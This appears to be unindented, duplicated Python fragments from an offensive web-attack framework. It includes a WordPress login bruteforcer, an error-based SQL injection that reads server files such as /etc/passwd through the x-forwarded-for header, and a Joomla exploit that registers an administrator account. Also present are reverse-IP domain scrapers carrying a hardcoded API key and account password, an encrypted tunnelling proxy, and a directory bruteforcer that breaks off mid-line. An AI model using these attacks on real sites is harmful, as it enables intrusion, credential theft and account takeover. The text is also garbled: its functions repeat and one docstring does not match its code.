def run(self, frmwk, args):
module_name = 'attack/web_bruter'
frmwk.print_status('Init paprams!')
victim = HTTP(self.options['URL'], timeout = self.advanced_options['TIMEOUT'])
victim.storecookie = True
checktype = 'successstr'
tokenstr = 'no-unread-messages'
param = 'log=__USER__&pwd=__PASS__&wp-submit=Log+In&redirect_to='+quote_plus(self.options['URL'])+'&testcookie=1'
frmwk.print_status('Start bruteforcer!')
bruter = frmwk.modules[module_name]
bruter.options.addString('URL', 'Link login', default = self.options['URL'])
bruter.options.addString('USERNAME', 'Account login', default = self.options['USERNAME'])
bruter.options.addString('PASSWORD', 'Password login', default = self.options['PASSWORD'])
bruter.options.addString('DATA', 'Date with POST method', default = param)
bruter.options.addString('CHECKTYPE', 'Type of checker success login', default = checktype)
bruter.options.addString('TOKEN', 'Error string', default = tokenstr)
bruter.options.addInteger('THREADS', 'Date with POST method', default = self.options['THREADS'])
bruter.options.addPath('USERLIST', 'passwords to test', default = self.options['USERLIST'])
bruter.options.addPath('PASSLIST', 'usernames to test', default = self.options['PASSLIST'])
bruter.options.addBoolean('VERBOSE', 'Verbose', default = self.options['VERBOSE'])
bruter.advanced_options.addString('COOKIE', 'Cookie', default = victim.headers['Cookie'] if victim.headers['Cookie'] else None)
bruter.advanced_options.addInteger('DELAY', 'Delay time', default = self.advanced_options['DELAY'])
bruter.advanced_options.addInteger('TIMEOUT', 'Time out request', default = self.advanced_options['TIMEOUT'])
bruter.advanced_options.addBoolean('STOP', 'Stop scanning', default = True)
bruter.run(frmwk, None)
frmwk.reload_module(module_name)
def Whoiswebhosting(self, searcher):
req = HTTP(searcher['URL'])
urls = []
data = req.Request(searcher['URL'] % (self.ip, 1))
last = search(
r'\?pi=([0-9]+)\&ob=SLD\&oo=DESC">\ \;\ \;Last\ \;>\>\;<\/a>',
data)
url = findall(
r'<td><a href="http:\/\/whois\.webhosting\.info\/.*?\.">(.*?)\.<\/a><\/td>',
data)
urls += url
if last:
page = last.group(1)
for i in range(2, int(page)):
data = req.Request(searcher['URL'] % (self.ip, i))
if search(
'The security key helps us prevent automated searches',
data):
break
url = findall(
r'<td><a href="http:\/\/whois\.webhosting\.info\/.*?\.">(.*?)\.<\/a><\/td>',
data)
urls += url
self.frmwk.print_status(
self.fmt_string.format(searcher['SITE'], urls.__len__()))
self.domains += urls
else:
self.frmwk.print_status(
self.fmt_string.format(searcher['SITE'], urls.__len__()))
self.domains += urls
def run(self, frmwk, args):
module_name = 'attack/web_bruter'
frmwk.print_status('Init paprams!')
victim = HTTP(self.options['URL'],
timeout=self.advanced_options['TIMEOUT'])
victim.storecookie = True
checktype = 'successstr'
tokenstr = 'no-unread-messages'
param = 'log=__USER__&pwd=__PASS__&wp-submit=Log+In&redirect_to=' + quote_plus(
self.options['URL']) + '&testcookie=1'
frmwk.print_status('Start bruteforcer!')
bruter = frmwk.modules[module_name]
bruter.options.addString('URL',
'Link login',
default=self.options['URL'])
bruter.options.addString('USERNAME',
'Account login',
default=self.options['USERNAME'])
bruter.options.addString('PASSWORD',
'Password login',
default=self.options['PASSWORD'])
bruter.options.addString('DATA',
'Date with POST method',
default=param)
bruter.options.addString('CHECKTYPE',
'Type of checker success login',
default=checktype)
bruter.options.addString('TOKEN', 'Error string', default=tokenstr)
bruter.options.addInteger('THREADS',
'Date with POST method',
default=self.options['THREADS'])
bruter.options.addPath('USERLIST',
'passwords to test',
default=self.options['USERLIST'])
bruter.options.addPath('PASSLIST',
'usernames to test',
default=self.options['PASSLIST'])
bruter.options.addBoolean('VERBOSE',
'Verbose',
default=self.options['VERBOSE'])
bruter.advanced_options.addString('COOKIE',
'Cookie',
default=victim.headers['Cookie'] if
victim.headers['Cookie'] else None)
bruter.advanced_options.addInteger(
'DELAY', 'Delay time', default=self.advanced_options['DELAY'])
bruter.advanced_options.addInteger(
'TIMEOUT',
'Time out request',
default=self.advanced_options['TIMEOUT'])
bruter.advanced_options.addBoolean('STOP',
'Stop scanning',
default=True)
bruter.run(frmwk, None)
frmwk.reload_module(module_name)
def __init__(self, host, keyworld, limit, delay):
super().__init__()
self.keyworld = quote_plus(keyworld)
self.limit = limit
self.delay = delay
self.request = HTTP(host, CONFIG.TIME_OUT, user_agents_type='bot')
self.count = 0
self.info = []
self.step = 10
def eWhois(self, searcher):
params = urlencode({'_method':'POST','data[User][email]':'*****@*****.**','data[User][password]':'RitX:::R1tX','data[User][remember_me]':'0'})
req = HTTP("http://www.ewhois.com/")
req.storecookie = True
req.rand_useragent = False
data = req.Request('http://www.ewhois.com/login/', 'POST', params)
data = req.Request("http://www.ewhois.com/export/ip-address/%s/" % self.ip)
urls = findall(r'"(.*?)","","","[UA\-[0-9]+\-[0-9]+|]",""',data)
self.frmwk.print_status(self.fmt_string.format(searcher['SITE'],urls.__len__()))
self.domains += urls
def BingApi(self, searcher):
KEY = "49EB4B94127F7C7836C96DEB3F2CD8A6D12BDB71"
req = HTTP(searcher['URL'])
data = req.Request(searcher['URL'] % (KEY, self.ip, 0))
total = search('<web:Total>([0-9]+)<\/web:Total>', data).group(1)
page = int(int(total) / 50 + 1)
for i in range(1, page):
data += req.Request(searcher['URL'] % (KEY, self.ip, i))
result = findall(r'<web:Url>(.+?)<\/web:Url>', data)
urls = []
for url in result:
urls.append(url.split('/', 3)[2])
self.frmwk.print_status(
self.fmt_string.format(searcher['SITE'], urls.__len__()))
self.domains += urls
class Module(Templates):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.version = 1
self.author = [ 'Kid' ]
self.description = 'Get Basic Meter Information By Reading Tables'
self.detailed_description = 'This module retreives some basic meter information and displays it in a human-readable way.'
self.options.addString('FILE', 'domain/ip', default = '/etc/passwd')
def run(self, frmwk, args):
url = 'http://www.google.com/'
self.victim = HTTP(url)
len = 1
# join = ''
while True:
header = {'x-forwarded-for': "1' order by (SELECT 1 from (select count(*),concat(floor(rand(0)*2),(substring((select(LOAD_FILE('%s'))),%s,62)))a from information_schema.tables group by a)b);-- -'" % (self.options['FILE'], len)}
data = self.victim.Request(url, 'POST', "uname=administrator&upass=12345612345&Submit=+++Login+++",header = header)
# print(data)
res = search("Duplicate entry '.(.*?)' for key ", data, DOTALL)
if res:
# join += res.group(1)
stdout.write(res.group(1))
stdout.flush()
else:
break
len += 62
# print('--------------data---------- : \n' + join)
def Filter(domain, infos, type):
subs = []
emails = []
checked = []
req = HTTP('https://docs.google.com/')
ci = 0
il = len(infos)
for i in infos:
ci += 1
pc = int(ci * 100 / il)
print_process(pc)
if i in checked:
continue
i['data'] = unquote(i['data'])
d = domain_filter(domain, unquote(i['url']))
d += domain_filter(domain, i['data'])
e = email_filter(domain, i['data'])
d = sorted(list(set(realdomain(d))))
e = sorted(list(set(realemail(e))))
if len(d) >= type or len(e) >= type:
try:
data = getLink(req, i['url'])
d += domain_filter(domain, data)
e += email_filter(domain, data)
except Exception as ex:
pass
sleep(2)
subs += sorted(list(set(realdomain(d))))
emails += sorted(list(set(realemail(e))))
checked.append(i)
print_line('')
return (subs, emails)
def reverseip(self, searcher):
try:
if 'SP' not in searcher:
req = HTTP(searcher['URL'])
if 'DATA' in searcher:
data = req.Request(searcher['URL'], 'POST',
searcher['DATA'] % self.ip)
else:
data = req.Request(searcher['URL'] % self.ip)
urls = findall(searcher['REGEX'], data)
self.frmwk.print_status(
self.fmt_string.format(searcher['SITE'], urls.__len__()))
self.domains += urls
else:
searcher['SP'](searcher)
except Exception as e:
pass
def run(self, frmwk, args):
url = 'http://www.google.com/'
self.victim = HTTP(url)
len = 1
# join = ''
while True:
header = {'x-forwarded-for': "1' order by (SELECT 1 from (select count(*),concat(floor(rand(0)*2),(substring((select(LOAD_FILE('%s'))),%s,62)))a from information_schema.tables group by a)b);-- -'" % (self.options['FILE'], len)}
data = self.victim.Request(url, 'POST', "uname=administrator&upass=12345612345&Submit=+++Login+++",header = header)
# print(data)
res = search("Duplicate entry '.(.*?)' for key ", data, DOTALL)
if res:
# join += res.group(1)
stdout.write(res.group(1))
stdout.flush()
else:
break
len += 62
# print('--------------data---------- : \n' + join)
def run(self, frmwk, args):
self.frmwk = frmwk
self.victim = HTTP(self.options['URL'],
timeout=self.advanced_options['TIMEOUT'])
self.victim.storecookie = True
self.verbose = self.options['VERBOSE']
self.userlist = []
self.passlist = []
self.success = []
self.victim.headers.update({'Cookie': self.advanced_options['COOKIE']}
if self.advanced_options['COOKIE'] else {})
#######################################
if self.options['USERNAME']:
self.userlist = self.options['USERNAME'].split(',')
else:
self.userlist = ReadFromFile(FullPath(self.options['USERLIST']))
if self.options['PASSWORD']:
self.passlist = self.options['PASSWORD'].split(',')
else:
for a in ReadFromFile(FullPath(self.options['PASSLIST'])):
self.passlist.append(a)
self.lenuser = len(self.userlist)
self.lenpass = len(self.passlist)
###############################################
listthread = []
if len(self.userlist) > 0:
self.temppass = []
for i in range(self.options['THREADS']):
t = Thread(target=self.worker)
listthread.append(t)
t.start()
try:
for t in listthread:
t.join()
except KeyboardInterrupt:
for t in listthread:
if t.isAlive():
t.terminate()
pass
##############################################
self.success = sorted(self.success)
self.frmwk.print_line()
self.frmwk.print_status("List login:\n-----------")
if len(self.success) > 0:
for u, p in self.success:
self.frmwk.print_success(
'SUCCESS: username: {0:<20} password: {1}'.format(
u, p))
self.frmwk.print_status("-----------")
else:
self.frmwk.print_status('Nothing to do!')
def run(self, frmwk, args):
self.frmwk = frmwk
self.module_name = 'attack/web_bruter'
checktype = 'successstr'
tokenstr = 'no-unread-messages'
self.frmwk.print_status('Init paprams!')
self.victim = HTTP(self.options['URL'],
timeout=self.advanced_options['TIMEOUT'])
self.victim.storecookie = True
self.frmwk.print_status('Start bruteforcer!')
brute = self.frmwk.modules[self.module_name]
brute.options.addString('URL',
'Link login',
default=self.options['URL'])
brute.options.addString('USERNAME',
'Account login',
default=self.options['USERNAME'])
brute.options.addString('PASSWORD',
'Password login',
default=self.options['PASSWORD'])
brute.options.addString('DATA', 'Date with POST method', default='')
brute.options.addString('CHECKTYPE',
'Type of checker success login',
default=checktype)
brute.options.addString('TOKEN', 'Error string', default=tokenstr)
brute.options.addInteger('THREADS',
'Date with POST method',
default=self.options['THREADS'])
brute.options.addPath('USERLIST',
'passwords to test',
default=self.options['USERLIST'])
brute.options.addPath('PASSLIST',
'usernames to test',
default=self.options['PASSLIST'])
brute.options.addBoolean('VERBOSE',
'Verbose',
default=self.options['VERBOSE'])
brute.advanced_options.addString('COOKIE', 'Cookie', default=None)
brute.advanced_options.addInteger(
'DELAY', 'Delay time', default=self.advanced_options['DELAY'])
brute.advanced_options.addInteger(
'TIMEOUT',
'Time out request',
default=self.advanced_options['TIMEOUT'])
brute.advanced_options.addBoolean('STOP',
'Stop scanning',
default=True)
brute.initcallbacker = self.initer
brute.run(self.frmwk, None)
self.login = brute.success
self.frmwk.reload_module(self.module_name)
class Searcher(Thread):
"""docstring for Searcher"""
def __init__(self, host, keyworld, limit, delay):
super().__init__()
self.keyworld = quote_plus(keyworld)
self.limit = limit
self.delay = delay
self.request = HTTP(host, CONFIG.TIME_OUT, user_agents_type='bot')
self.count = 0
self.info = []
self.step = 10
def run(self):
while True:
printer.print_line('\t{0:<25} {1:d}'.format(self.name, self.count))
uri = self.uriCreater()
if not self.Has_Next(self.do_search(uri)):
break
if self.count <= 1:
break
self.count += self.step
if self.count >= self.limit:
break
sleep(self.delay)
def do_search(self, uri):
data = self.request.Request(uri)
#print("-----------data : %s" % data)
if data != '':
try:
info = self.Getdata(data)
except Exception as e:
printer.print_error('%s : Nothing to do !' % self.name)
pass
return ''
self.do_split(info)
return data
def do_split(self, info):
ifl = []
for i in info:
try:
ifl.append(self.Spliter(i.strip()))
except Exception as e:
printer.print_error('%s Error : %s\ncontent: %s' %
(self.name, e, i))
pass
self.info += ifl
self.step = len(ifl)
def run(self, frmwk, args):
url = self.options['URL']
email = CONFIG.GMAIL_ACCOUNT[0]
self.username = '******' + str(randint(1000,100000))
self.password = '******'
victim = HTTP(url)
victim.storecookie = True
exploit = 'jform%5Bname%5D=exploit&jform%5Busername%5D=exploit&jform%5Bpassword1%5D=123123&jform%5Bpassword2%5D=1231233&jform%5Bemail1%5D=pentest%40yahoo.com&jform%5Bemail2%5D=pentest%40yahoo.com&option=com_users&task=registration.register&jform%5Bgroups%5D%5B%5D=7&'
registry = 'jform%5Bname%5D={0}&jform%5Busername%5D={0}&jform%5Bpassword1%5D={1}&jform%5Bpassword2%5D={1}&jform%5Bemail1%5D={2}&jform%5Bemail2%5D={2}&option=com_users&task=registration.register&jform%5Bgroups%5D%5B%5D=7&'.format(self.username, self.password, email)
frmwk.print_status('Init token')
data = victim.Request(url)
token = search('name="([a-zA-Z0-9]{32})"\svalue="1"', data)
if token:
token = token.group(1)
else:
token = ''
frmwk.print_status('Send false request')
url = url + '?task=registration.register'
victim.Request(url, 'POST', exploit + token + '=1')
frmwk.print_status('Send exploit request')
data = victim.Request(url, 'POST', registry + token + '=1')
warning = search('class="warning\smessage">(.*?)</dd>', data, DOTALL)
message = search('class="message\smessage">(.*?)</dd>', data, DOTALL)
if warning:
frmwk.print_error('Error during exploit : ' + warning.group(1))
return
elif message:
frmwk.print_success('Successful : ' + message.group(1).strip())
frmwk.print_success('Account login: %s | %s' % (self.username, self.password))
else:
frmwk.print_status('Hên xui !')
frmwk.print_status('Sleep 30s for mail receiver !')
sleep(30)
for email in self.getMail():
active = search('(http(.*?)activate&token=(.*?))\s', email['body'], DOTALL)
if active:
active_link = active.group(1)
frmwk.print_status('Active link: ' + active_link)
break
if active_link:
data = victim.Request(active_link)
message = search('class="message\smessage">(.*?)</dd>', data, DOTALL)
if message:
frmwk.print_success('Actived Account: %s | %s' % (self.username, self.password))
def eWhois(self, searcher):
params = urlencode({
'_method': 'POST',
'data[User][email]': '*****@*****.**',
'data[User][password]': 'RitX:::R1tX',
'data[User][remember_me]': '0'
})
req = HTTP("http://www.ewhois.com/")
req.storecookie = True
req.rand_useragent = False
data = req.Request('http://www.ewhois.com/login/', 'POST', params)
data = req.Request("http://www.ewhois.com/export/ip-address/%s/" %
self.ip)
urls = findall(r'"(.*?)","","","[UA\-[0-9]+\-[0-9]+|]",""', data)
self.frmwk.print_status(
self.fmt_string.format(searcher['SITE'], urls.__len__()))
self.domains += urls
def worker(self, c_conn, c_addr):
self.frmwk.print_status("Accept new connect from " + str(c_addr))
################### CONNET TUNNEL #####################
### choin and connect to tunnel
c_tunnel = self.choin_tunnel() # chon 1 tunnel
t_conn = HTTP(c_tunnel[0], timeout=self.connect_timout)
### check tunnel is open
if not t_conn:
self.frmwk.print_error("Can't connect to tunnel")
return None
### encrypt/decrypt init
# tunnel_ks = self.vc_generatekeyhash(c_tunnel[2])
# tunnel_pe = self.vc_init(c_tunnel[2],tunnel_ks)
# tunnel_pd = dict((tunnel_pe[i],i) for i in range(0,len(tunnel_pe)))
if self.encrypt:
crypt = crypton(c_tunnel[2])
else:
crypt = None
################### START READ DATA CLIENT #####################
### get status and header from sockert
c_status, c_headers, c_content_len = self.socket_receiver(c_conn)
### set url, host, port, method
s_https = 0
host = c_status[1]
if host.startswith(b"http"):
parser = parse.urlparse(host)
s_host = parser.hostname
s_port = parser.port
s_path = b"/" + host.split(b"/", 3)[3]
if not s_port:
if parser.scheme == "https":
s_port = 443
else:
s_port = 80
if parser.scheme == "https":
s_https = 1
else:
self.frmwk.print_error("Unknown client request connect !")
return None
### set status
c_send_header = [b" ".join([c_status[0], s_path, c_status[2]])]
### set header for send
c_headers.update({b"Connection": b"close"}) # fix host delay
for k, v in c_headers.items():
if k.startswith(b"Proxy"):
continue
c_send_header.append(k + b": " + v)
## add headers to send all data
c_send_header = b"\r\n".join(c_send_header) + b"\r\n\r\n"
### set init param of tunnel
c_send_init = self.send_init(s_host, s_port, self.r_buffer, self.s_buffer, s_https, c_tunnel, crypt)
### init and send tunnel parameter
t_conn.init(c_tunnel[0], "POST", {"Content-Length": len(c_send_init) + len(c_send_header) + c_content_len})
t_conn.send(c_send_init)
del c_send_init # clear memory
### get content from client and send to server with r_buffer
if c_content_len > 0:
c_sent = 0
####### send header with content for full r_buffer encrypt
if self.encrypt:
mod_len = len(c_send_header) % len(c_tunnel[2])
data = c_conn.recv(mod_len)
data = c_send_header + data
data_len = len(data)
for i in range(0, data_len, self.r_buffer):
t_conn.send(crypt.vc_encrypt(data[i : min(i + self.r_buffer, data_len - i)]))
c_sent = mod_len
else:
t_conn.send(c_send_header)
###### send content
if c_sent < c_content_len:
while True:
data = c_conn.recv(min(self.r_buffer, c_content_len - c_sent))
if self.encrypt:
t_conn.send(crypt.vc_encrypt(data))
else:
t_conn.send(data)
c_sent += len(data)
if not data or c_sent == content_lent:
break
else:
if self.encrypt:
t_conn.send(crypt.vc_encrypt(c_send_header))
else:
t_conn.send(c_send_header)
del c_send_header # clear memory
############## END SEND ################
############# START RECV ###############
try:
for res_chunk in t_conn.recv(self.s_buffer):
if self.encrypt:
c_conn.send(crypt.vc_decrypt(res_chunk))
else:
c_conn.send(res_chunk)
except Exception as e:
self.frmwk.print_error(str(e))
finally:
t_conn.request.close()
c_conn.close()
self.frmwk.print_status("Closed connect from " + str(c_addr))
def run(self, frmwk, args):
self.version = None
url = self.options['URL']
if not url.endswith('/'):
url += '/'
###### dict from http://www.pepelux.org/programs/joomlascan/ #######
storeversion = [
[
'language/en-GB/en-GB.ini',
[[
'version 1.5.x 2005-10-30 14:10:00',
'1.5.0.Beta-1.5.0.Beta'
], ['9913 2008-01-09 21:28:35Z', '1.5.0.Stable-1.5.0.Stable'],
['9990 2008-02-05 21:54:06Z', '1.5.1.Stable-1.5.1.Stable'],
['10053 2008-02-21 18:57:54Z', '1.5.2.Stable-1.5.2.Stable'],
['10208 2008-04-17 16:43:15Z', '1.5.3.Stable'],
['10498 2008-07-04 00:05:36Z', '1.5.4.Stable-1.5.7.Stable'],
['11214 2008-10-26 01:29:04Z', '1.5.8.Stable-1.5.8.Stable'],
['11391 2009-01-04 13:35:50Z', '1.5.9.Stable-1.5.11.Stable'],
[
'Copyright (C) 2005 - 2010 Open Source Matters',
'1.5.16.Stable-1.5.20.Stable'
],
['Problem with Joomla site', '1.5.17.Stable-1.5.17.Stable'],
['17165 2010-05-17 15:59:19Z', '1.6.0.Beta1-1.6.0.Beta1'],
['17420 2010-05-31 11:14:10Z', '1.6.0.Beta2-1.6.0.Beta2'],
['17675 2010-06-14 10:20:52Z', '1.6.0.Beta3-1.6.0.Beta3'],
['17903 2010-06-28 01:52:11Z', '1.6.0.Beta4-1.6.0.Beta4'],
['18082 2010-07-12 01:02:52Z', '1.6.0.Beta5-1.6.0.Beta5'],
['18198 2010-07-21 00:58:13Z', '1.6.0.Beta6-1.6.0.Beta8'],
['20196 2011-01-09 02:40:25Z', '1.6.0.Stable-1.6.1.Stable'],
['20990 2011-03-18 16:42:30Z', '1.6.2.Stable-1.7.5.Stable']]
],
[
'components/com_contact/metadata.xml',
[['8178 2007-07-23 05:39:47Z', '1.5.0.RC2-1.5.18.Stable'],
['17437 2010-06-01 14:35:04Z', '1.5.19.Stable-1.5.20.Stable'],
['16235 2010-04-20 04:13:25Z', '1.6.0.Stable-1.7.5.Stable']]
],
[
'htaccess.txt',
[['47 2005-09-15 02:55:27Z', '1.0.0-1.0.2'],
['423 2005-10-09 18:23:50Z', '1.0.3-1.0.3'],
['1005 2005-11-13 17:33:59Z', '1.0.4-1.0.5'],
['1570 2005-12-29 05:53:33Z', '1.0.6-1.0.7'],
['2368 2006-02-14 17:40:02Z', '1.0.8-1.0.9'],
['4085 2006-06-21 16:03:54Z', '1.0.10-1.0.10'],
['4756 2006-08-25 16:07:11Z', '1.0.11-1.0.11'],
['5973 2006-12-11 01:26:33Z', '1.0.12-1.0.12'],
['5975 2006-12-11 01:26:33Z', '1.0.13-1.0.14.RC1'],
['9317 2007-11-07 03:02:08Z', '1.5.0.RC4-1.5.0.Stable'],
['10492 2008-07-02 06:38:28Z', '1.5.0.Beta-1.5.14.Stable'],
['13415 2009-11-03 15:53:25Z', '1.5.15.Stable-1.5.15.Stable'],
['14401 2010-01-26 14:10:00Z', '1.5.16.Stable-1.5.20.Stable'],
['14276 2010-01-18 14:20:28Z', '1.6.0.Beta1-1.6.0.Beta8'],
['20196 2011-01-09 02:40:25Z', '1.6.0.Stable-1.6.1.Stable'],
['21101 2011-04-07 15:47:33Z', '1.6.2.Stable-1.7.5.Stable']]
],
[
'administrator/language/en-GB/en-GB.ini',
[[
'version 1.5.x 2005-10-30 14:10:00',
'1.5.0.Beta-1.5.0.Beta'
], ['9869 2008-01-05 04:00:13Z', '1.5.0.Stable-1.5.0.Stable'],
['9990 2008-02-05 21:54:06Z', '1.5.1.Stable-1.5.1.Stable'],
['10122 2008-03-10 11:58:27Z', '1.5.2.Stable-1.5.2.Stable'],
['10186 2008-04-02 13:10:12Z', '1.5.3.Stable-1.5.3.Stable'],
['10500 2008-07-04 06:57:07Z', '1.5.4.Stable-1.5.4.Stable'],
['10571 2008-07-21 01:27:35Z', '1.5.5.Stable-1.5.7.Stable'],
['11213 2008-10-25 12:43:11Z', '1.5.8.Stable-1.5.8.Stable'],
['11391 2009-01-04 13:35:50Z', '1.5.9.Stable-1.5.9.Stable'],
['11667 2009-03-08 20:32:38Z', '1.5.10.Stable-1.5.10.Stable'],
['11799 2009-05-06 02:15:50Z', '1.5.11.Stable-1.5.11.Stable'],
['12308 2009-06-23 04:05:28Z', '1.5.12.Stable-1.5.14.Stable'],
['13243 2009-10-20 04:01:04Z', '1.5.15.Stable-1.5.15.Stable'],
['16380 2010-04-23 09:19:48Z', '1.5.16.Stable-1.5.20.Stable'],
['17165 2010-05-17 15:59:19Z', '1.6.0.Beta1-1.6.0.Beta1'],
['17387 2010-05-30 16:28:20Z', '1.6.0.Beta2-1.6.0.Beta2'],
['17675 2010-06-14 10:20:52Z', '1.6.0.Beta3-1.6.0.Beta3'],
['17898 2010-06-27 13:03:01Z', '1.6.0.Beta4-1.6.0.Beta4'],
['18090 2010-07-12 10:49:58Z', '1.6.0.Beta5-1.6.0.Beta5'],
['18198 2010-07-21 00:58:13Z', '1.6.0.Beta6-1.6.0.Beta6'],
['18378 2010-08-09 17:29:44Z', '1.6.0.Beta7-1.6.0.Beta7'],
['18572 2010-08-22 09:57:58Z', '1.6.0.Beta8-1.6.0.Beta8'],
['20196 2011-01-09 02:40:25Z', '1.6.0.Stable-1.6.0.Stable'],
['20899 2011-03-07 20:56:09Z', '1.6.1.Stable-1.6.1.Stable'],
['20990 2011-03-18 16:42:30Z', '1.6.2.Stable-1.6.6.Stable'],
['21721 2011-07-01 08:48:47Z', '1.7.0.Stable-1.7.2.Stable'],
['22370 2011-11-09 16:18:06Z', '1.7.3.Stable-1.7.5.Stable']]
],
[
'language/en-GB/en-GB.com_media.ini',
[['10496 2008-07-03 07:08:39Z', '1.5.0.Beta-1.5.12.Stable'],
['12540 2009-07-22 17:34:44Z', '1.5.13.Stable-1.5.14.Stable'],
['13311 2009-10-24 04:13:49Z', '1.5.15.Stable-1.5.15.Stable'],
['14401 2010-01-26 14:10:00Z', '1.5.16.Stable-1.5.20.Stable'],
['17044 2010-05-14 09:52:50Z', '1.6.0.Beta1-1.6.0.Beta3'],
['17769 2010-06-20 01:50:48Z', '1.6.0.Beta4-1.6.0.Beta8'],
['20196 2011-01-09 02:40:25Z', '1.6.0.Stable-1.6.6.Stable'],
['21660 2011-06-23 13:25:32Z', '1.7.0.Stable-1.7.0.Stable'],
['21948 2011-08-08 16:02:50Z', '1.7.1.Stable-1.7.5.Stable']]
],
[
'configuration.php-dist',
[['47 2005-09-15 02:55:27Z', '1.0.0-1.0.0'],
['217 2005-09-21 15:15:58Z', '1.0.1-1.0.2'],
['506 2005-10-13 05:49:24Z', '1.0.3-1.0.7'],
['2622 2006-02-26 04:16:09Z', '1.0.8-1.0.8'],
['3754 2006-05-31 12:08:37Z', '1.0.9-1.0.10'],
['4802 2006-08-28 16:18:33Z', '1.0.11-1.0.12'],
['7424 2007-05-17 15:56:10Z', '1.0.13-1.0.15'],
['9991 2008-02-05 22:13:22Z', '1.5.0.Stable-1.5.8.Stable'],
['11409 2009-01-10 02:27:08Z', '1.5.9.Stable-1.5.9.Stable'],
['11687 2009-03-11 17:49:23Z', '1.5.10.Stable-1.5.15.Stable'],
['14401 2010-01-26 14:10:00Z', '1.5.16.Stable-1.5.20.Stable']]
]
]
requester = HTTP(url)
for link in storeversion:
frmwk.print_status('Checking: ' + url + link[0])
data = requester.Request(url + link[0])
if requester.response.status == 200:
for vstr in link[1]:
if data.find(vstr[0]) != -1:
self.version = vstr[1]
break
if self.version:
break
if not self.version:
frmwk.print_status('Checking: ' + url + 'language/en-GB/en-GB.xml')
data = requester.Request(url + 'language/en-GB/en-GB.xml')
if requester.response.status == 200:
version = search('<version>(.*?)</version>', data)
if version:
self.version = version.group(1)
if not self.version:
frmwk.print_status('Checking: ' + url +
'components/com_mailto/mailto.xml')
data = requester.Request(url + 'components/com_mailto/mailto.xml')
if requester.response.status == 200:
version = search('<version>(.*?)</version>', data)
if version:
self.version = version.group(1)
if self.version:
frmwk.print_success('Fount version: ' + self.version)
else:
frmwk.print_error('Unknown version !')
def worker(self, c_conn, c_addr):
self.frmwk.print_status("Accept new connect from " + str(c_addr))
################### CONNET TUNNEL #####################
### choin and connect to tunnel
c_tunnel = self.choin_tunnel() # chon 1 tunnel
t_conn = HTTP(c_tunnel[0], timeout=self.connect_timout)
### check tunnel is open
if not t_conn:
self.frmwk.print_error('Can\'t connect to tunnel')
return None
### encrypt/decrypt init
# tunnel_ks = self.vc_generatekeyhash(c_tunnel[2])
# tunnel_pe = self.vc_init(c_tunnel[2],tunnel_ks)
# tunnel_pd = dict((tunnel_pe[i],i) for i in range(0,len(tunnel_pe)))
if self.encrypt:
crypt = crypton(c_tunnel[2])
else:
crypt = None
################### START READ DATA CLIENT #####################
### get status and header from sockert
c_status, c_headers, c_content_len = self.socket_receiver(c_conn)
### set url, host, port, method
s_https = 0
host = c_status[1]
if host.startswith(b'http'):
parser = parse.urlparse(host)
s_host = parser.hostname
s_port = parser.port
s_path = b'/' + host.split(b'/', 3)[3]
if not s_port:
if parser.scheme == 'https':
s_port = 443
else:
s_port = 80
if parser.scheme == 'https':
s_https = 1
else:
self.frmwk.print_error("Unknown client request connect !")
return None
### set status
c_send_header = [b' '.join([c_status[0], s_path, c_status[2]])]
### set header for send
c_headers.update({b'Connection': b'close'}) # fix host delay
for k, v in c_headers.items():
if k.startswith(b'Proxy'):
continue
c_send_header.append(k + b': ' + v)
## add headers to send all data
c_send_header = b"\r\n".join(c_send_header) + b"\r\n\r\n"
### set init param of tunnel
c_send_init = self.send_init(s_host, s_port, self.r_buffer,
self.s_buffer, s_https, c_tunnel, crypt)
### init and send tunnel parameter
t_conn.init(
c_tunnel[0], 'POST', {
'Content-Length':
len(c_send_init) + len(c_send_header) + c_content_len
})
t_conn.send(c_send_init)
del c_send_init # clear memory
### get content from client and send to server with r_buffer
if c_content_len > 0:
c_sent = 0
####### send header with content for full r_buffer encrypt
if self.encrypt:
mod_len = len(c_send_header) % len(c_tunnel[2])
data = c_conn.recv(mod_len)
data = c_send_header + data
data_len = len(data)
for i in range(0, data_len, self.r_buffer):
t_conn.send(
crypt.vc_encrypt(
data[i:min(i + self.r_buffer, data_len - i)]))
c_sent = mod_len
else:
t_conn.send(c_send_header)
###### send content
if c_sent < c_content_len:
while True:
data = c_conn.recv(
min(self.r_buffer, c_content_len - c_sent))
if self.encrypt:
t_conn.send(crypt.vc_encrypt(data))
else:
t_conn.send(data)
c_sent += len(data)
if not data or c_sent == content_lent:
break
else:
if self.encrypt:
t_conn.send(crypt.vc_encrypt(c_send_header))
else:
t_conn.send(c_send_header)
del c_send_header # clear memory
############## END SEND ################
############# START RECV ###############
try:
for res_chunk in t_conn.recv(self.s_buffer):
if self.encrypt:
c_conn.send(crypt.vc_decrypt(res_chunk))
else:
c_conn.send(res_chunk)
except Exception as e:
self.frmwk.print_error(str(e))
finally:
t_conn.request.close()
c_conn.close()
self.frmwk.print_status("Closed connect from " + str(c_addr))
def run(self, frmwk, args):
self.frmwk = frmwk
self.dirs = ReadFromFile(FullPath(
self.options['DIRLIST'])) if self.options['DIRLIST'] else []
self.files = ReadFromFile(FullPath(
self.options['FILELIST'])) if self.options['FILELIST'] else []
self.url = self.options['URL'] if self.options['URL'].endswith(
'/') else self.options['URL'] + '/'
self.type = self.options['TYPE']
self.thread = self.options['THREADS']
self.stop = self.options['STOP']
self.extension = self.options['EXTENSION'].split(',')
self.timeout = self.advanced_options['TIMEOUT']
self.into = self.advanced_options['INTO']
self.victim = HTTP(self.url, timeout=self.timeout)
self.victim.headers.update({'Cookie': self.advanced_options['COOKIE']}
if self.advanced_options['COOKIE'] else {})
self.success = []
self.tmp_dirs = self.dirs + []
self.current_dir = ''
self.locker = Lock()
if self.type in ['lenght', 'auto']:
victim = deepcopy(self.victim)
victim.redirect = False
self.frmwk.print_status('Init not found infomation')
victim.Request(self.url + 'ASDASdadhkjlhjfasdfawefa/', 'GET')
if self.type == 'auto':
# if victim.response.status == 404:
# self.type = 'status'
# self.frmwk.print_success('auto get type: error')
# el
if victim.response.status == 200:
self.type = 'lenght'
self.frmwk.print_success('auto get type: lenght')
else:
self.type = 'location'
self.frmwk.print_success('auto get type: location')
if self.type == 'lenght':
self.notfounddir = len(victim.result)
if self.type in ['lenght', 'location']:
self.notfoundfile = len(
victim.Request(
self.url + 'adfasdaszxcvzdczxfasASasda.' +
self.extension[0], 'GET'))
self.offset = self.advanced_options['OFFSET']
del victim
if self.type == 'location':
self.victim.redirect = False
self.frmwk.print_status('Starting scanner')
########check file in current path######
try:
if self.url.endswith('/'):
